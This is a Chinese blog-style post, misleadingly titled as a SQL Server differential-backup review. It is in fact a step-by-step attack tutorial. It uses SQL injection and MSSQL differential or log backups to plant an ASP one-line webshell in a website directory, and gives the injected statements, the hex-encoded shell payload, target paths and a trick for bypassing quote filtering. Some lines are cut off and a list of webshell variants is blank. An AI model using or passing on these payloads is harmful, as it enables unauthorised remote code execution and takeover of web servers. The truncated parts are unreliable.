sqlserver定时差异备份_复习⼀下sqlserver的差异备份
MSSQL差异备份,就是和前⼀次备份作对⽐,把不⼀样的内容备份下来,这样,只要前⼀次备份后,插⼊新的内容,差异备份就可以把刚
插⼊的内容备份出来,⽽这个备份⽂件将⼤⼤减少,得到webShell的成功也提⾼了不少!
差异备份的流程⼤概这样:
1.完整备份⼀次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--
2.创建表并插曲⼊数据
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
3.进⾏差异备份
backup database 库名 to disk='⽬标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
上⾯
0x3C25657865637574652872657175657374282261222929253E
就是⼀句话⽊马的内容:
如下是⽹上常见的差异备份代码,思路⼀样!
===================================================
利⽤差异备份提⾼提⾼backupwebshell的成功率,减少⽂件⼤⼩
步骤:
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backu
create table [dbo].[xiaolu] ([cmd] [image]);
insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
declare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B006
0x77006F006B0061006F002E00620061006B00为wokao.bak
0x3C25657865637574652872657175657374282261222929253E是
0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
声明:⽅法不是我想的,我只是写⼯具,默认得到shell是
===============================================================
我发现上⾯代码,有时会⽆效,⽽直接⽤
backup database 库名 to disk = 'c:\ddd.bak'
create table [dbo].[dtest] ([cmd] [image]);
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)
backup database 库名 to disk='⽬标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
却可以成功,所以把最原始的⽅法写出来!思路是前⼈所创,这不说⼤家也知道的!
库名 必须要有效的库名,⼀般注⼊⼯具都可以得到!如果某站过滤 "‘",就要把字符内容转为数值了!
⽹上还有log增量备份的,我也把他记录⼀下
=====================================================
另⼀种log增量备份技术:
';alter database null set RECOVERY FULL--
';create table cmd (a image)--
';backup log null to disk = 'f:\cmd' with init--
';insert into cmd (a) values (0x3C2565786563757465287265717565737428226122292 9253EDA)--
';backup log null to disk = '备份路径'--
PS:0x3C2565786563757465287265717565737428226122292
sqlserver备份表语句9253EDA 是⼀句话⼩马16进制转来的
说到⼀句话马,还可以有这么⼏种写法:
a).
b).
c).%>
d).
e).
时间: 2007-03-06
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系QQ:729038198,我们将在24小时内删除。
发表评论